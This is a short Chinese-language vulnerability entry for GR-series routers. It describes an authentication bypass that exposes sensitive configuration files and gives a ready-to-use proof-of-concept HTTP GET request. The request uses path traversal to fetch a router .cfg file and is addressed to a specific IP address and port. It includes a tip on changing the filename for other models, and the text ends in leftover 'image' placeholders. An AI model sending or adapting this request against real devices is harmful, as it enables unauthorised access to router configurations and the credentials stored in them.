产品: GR系列路由器
版本: 全部
风险等级: 高危
危害: 攻击者可利用此漏洞,通过构造特殊请求包绕过身份验证,获取路由器敏感信息。
原理: 路由器未对目录及相关文件进行访问认证
漏洞利用代码:
注意:需修改POC中的文件名后缀,例如GR8300.cfg
GET /userLogin.asp/../actionpolicy_status/../GR1100-P.cfg HTTP/1.1
Host: 59.35.220.76:8989
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
image
image
image